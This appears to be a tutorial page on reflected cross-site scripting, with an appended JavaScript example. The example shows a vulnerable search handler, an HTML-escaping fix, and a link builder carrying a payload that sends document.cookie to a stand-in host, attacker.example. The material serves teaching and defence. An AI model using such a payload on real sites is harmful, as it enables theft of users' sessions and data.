Reflected XSS

The application or API includes unvalidated and unescaped user input as part of its HTML output. In the reflected variant the input arrives in the current request (typically a URL query parameter or form field) and is echoed straight back in the response, without being stored.

  • That is, the HTML displays a string sent by the user in that same request.

The attacker sends the victim a malicious link to the vulnerable application itself, with the payload embedded in the URL (for example in a query parameter). When the victim opens it, the server reflects the payload into the page and the victim's browser runs it.

  • Delivered through email, posted in a chat, etc.

A successful attack lets the attacker execute arbitrary HTML and JavaScript in the victim's browser, within the origin of the vulnerable application, so the script can read what that page can read (DOM content, cookies not marked HttpOnly) and send requests as the victim.
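The whole chain above, as an added example that is not part of the original page: a search handler that reflects the `q` query parameter into HTML, first in the vulnerable form and then with output escaping, plus the link the attacker would send. The `/search` route, the `q` parameter, the hostnames `shop.example` and `attacker.example`, and the payload are all constructed for illustration.

```javascript
// Added example (not from the original page). The route /search, the parameter q,
// and the hostnames shop.example / attacker.example are assumptions for illustration.

const VULNERABLE_ORIGIN = "https://shop.example"; // hypothetical vulnerable site

// Simulates the vulnerable server: the raw query value is concatenated into HTML,
// so whatever the URL carries is reflected verbatim into the response.
function renderSearchVulnerable(requestUrl) {
  const q = new URL(requestUrl).searchParams.get("q") ?? "";
  return `<h1>Results for ${q}</h1>`; // unescaped user input: reflected XSS
}

// Fix: escape the characters that change meaning in HTML text content.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Same handler with the input escaped before it is placed into the markup.
function renderSearchSafe(requestUrl) {
  const q = new URL(requestUrl).searchParams.get("q") ?? "";
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// What the attacker delivers to the victim: a link to the *vulnerable* site,
// with the payload URL-encoded into the q parameter. The victim's browser
// requests it and the server echoes the payload back into the page.
function buildMaliciousLink(payload) {
  const u = new URL("/search", VULNERABLE_ORIGIN);
  u.searchParams.set("q", payload); // percent-encodes the payload for the URL
  return u.toString();
}

// Demonstration aid only (not a security control): did a script tag reach the markup?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed payload: exfiltrates the page's cookies to the attacker's host.
const payload = '<script>fetch("https://attacker.example/c?"+document.cookie)</script>';
const link = buildMaliciousLink(payload);

console.log("link sent to victim:", link);
console.log("vulnerable response:", renderSearchVulnerable(link));
console.log("fixed response:     ", renderSearchSafe(link));
```

Run with `node`: the vulnerable response contains the `<script>` element intact, while the fixed response contains only `&lt;script&gt;...`, which the browser renders as text. Note that escaping is context-specific; the `escapeHtml` above is correct for HTML text and attribute values, but input placed inside a `<script>` block, a URL, or CSS needs the encoding for that context.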
